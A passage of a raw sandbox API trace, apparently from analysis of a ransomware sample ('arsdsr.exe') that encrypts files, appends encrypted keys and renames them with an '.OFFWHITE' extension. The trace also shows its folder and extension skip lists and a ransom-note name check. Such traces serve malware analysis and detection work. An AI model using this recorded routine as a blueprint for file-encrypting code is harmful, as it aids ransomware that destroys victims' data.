Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" [0144.705] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.705] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.705] PathFindExtensionW (pszPath="ONINTL.REST.trx_dll") returned=".trx_dll" [0144.705] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.705] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.705] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.706] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.706] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.706] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.706] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.706] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.706] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.706] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.706] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.706] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.706] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.706] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.706] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.706] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.706] GetProcessHeap () returned 0x500000 [0144.706] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eaa0 [0144.706] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.707] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=260960) returned 1 [0144.707] GetProcessHeap () returned 0x500000 [0144.707] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.707] GetProcessHeap () returned 0x500000 [0144.707] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.707] GetProcessHeap () returned 0x500000 [0144.707] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.707] GetProcessHeap () returned 0x500000 [0144.708] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.708] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.708] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.708] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.708] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.708] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.708] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.708] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.708] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.708] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.708] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.708] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.708] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.709] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3fb60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.709] SetLastError (dwErrCode=0x0) [0144.709] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.711] GetLastError () returned 0x0 [0144.711] GetLastError () returned 0x0 [0144.711] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3fc60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.711] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.711] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3fd60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.711] WriteFile (in: hFile=0x218, lpBuffer=0x52eaa0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eaa0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.711] GetProcessHeap () returned 0x500000 [0144.711] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3fb60) returned 0x5607c8 [0144.711] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.711] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x3fb60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x3fb60, lpOverlapped=0x0) returned 1 [0144.728] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.729] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x3fb60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x3fb60, lpOverlapped=0x0) returned 1 [0144.730] GetProcessHeap () returned 0x500000 [0144.730] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.730] CloseHandle (hObject=0x218) returned 1 [0144.730] GetProcessHeap () returned 0x500000 [0144.730] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.730] GetProcessHeap () returned 0x500000 [0144.730] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.730] GetProcessHeap () returned 0x500000 [0144.730] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.730] GetProcessHeap () returned 0x500000 [0144.730] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.730] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" [0144.730] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.OFFWHITE" [0144.731] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll.offwhite")) returned 1 [0144.731] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ab87a00, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1ab87a00, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x37560, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="OUTLLIBR.DLL.trx_dll", cAlternateFileName="OUTLLI~1.TRX")) returned 1 [0144.731] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2=".") returned 1 [0144.731] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="..") returned 1 [0144.731] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="...") returned 1 [0144.731] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="windows") returned -1 [0144.732] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0144.732] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="rsa") returned -1 [0144.732] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0144.732] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="programdata") returned -1 [0144.732] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="appdata") returned 1 [0144.732] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="program files") returned -1 [0144.732] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0144.732] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.732] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="OUTLLIBR.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" [0144.732] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.732] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.732] PathFindExtensionW (pszPath="OUTLLIBR.DLL.trx_dll") returned=".trx_dll" [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.732] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.733] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.733] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.733] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.733] GetProcessHeap () returned 0x500000 [0144.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eab0 [0144.733] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.734] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=226656) returned 1 [0144.734] GetProcessHeap () returned 0x500000 [0144.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.734] GetProcessHeap () returned 0x500000 [0144.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.734] GetProcessHeap () returned 0x500000 [0144.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.734] GetProcessHeap () returned 0x500000 [0144.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.734] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.734] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.734] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.734] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.734] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.734] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.734] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.735] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.735] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.735] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.735] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.735] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.735] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x37560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.735] SetLastError (dwErrCode=0x0) [0144.735] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.737] GetLastError () returned 0x0 [0144.737] GetLastError () returned 0x0 [0144.737] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x37660, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.737] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.738] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x37760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.738] WriteFile (in: hFile=0x218, lpBuffer=0x52eab0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eab0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.738] GetProcessHeap () returned 0x500000 [0144.738] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x37560) returned 0x5607c8 [0144.738] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.738] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x37560, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x37560, lpOverlapped=0x0) returned 1 [0144.753] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.753] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x37560, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x37560, lpOverlapped=0x0) returned 1 [0144.754] GetProcessHeap () returned 0x500000 [0144.754] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.754] CloseHandle (hObject=0x218) returned 1 [0144.754] GetProcessHeap () returned 0x500000 [0144.754] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.754] GetProcessHeap () returned 0x500000 [0144.754] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.754] GetProcessHeap () returned 0x500000 [0144.754] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.754] GetProcessHeap () returned 0x500000 [0144.754] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.754] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" [0144.754] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.OFFWHITE" [0144.755] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll.offwhite")) returned 1 [0144.755] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ab87a00, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1ab87a00, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0xa6560, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="OUTLLIBR.REST.trx_dll", cAlternateFileName="OUTLLI~2.TRX")) returned 1 [0144.755] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2=".") returned 1 [0144.755] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="..") returned 1 [0144.756] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="...") returned 1 [0144.756] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="windows") returned -1 [0144.756] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0144.756] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="rsa") returned -1 [0144.756] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0144.756] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="programdata") returned -1 [0144.756] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="appdata") returned 1 [0144.756] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="program files") returned -1 [0144.756] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="program files (x86)") returned -1 [0144.756] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.756] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="OUTLLIBR.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" [0144.756] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.756] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.756] PathFindExtensionW (pszPath="OUTLLIBR.REST.trx_dll") returned=".trx_dll" [0144.756] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.756] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.756] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.756] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.756] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.756] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.756] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.756] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.756] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.756] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.757] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.757] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.757] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.757] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.757] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.757] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.757] GetProcessHeap () returned 0x500000 [0144.757] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eac0 [0144.757] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.758] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=681312) returned 1 [0144.758] GetProcessHeap () returned 0x500000 [0144.758] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.758] GetProcessHeap () returned 0x500000 [0144.758] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.758] GetProcessHeap () returned 0x500000 [0144.758] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.758] GetProcessHeap () returned 0x500000 [0144.758] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.759] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.759] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.759] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.759] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.759] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.759] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.759] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.759] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.759] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.759] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.759] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.759] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.759] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xa6560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.760] SetLastError (dwErrCode=0x0) [0144.760] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.762] GetLastError () returned 0x0 [0144.762] GetLastError () returned 0x0 [0144.762] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xa6660, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.762] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, 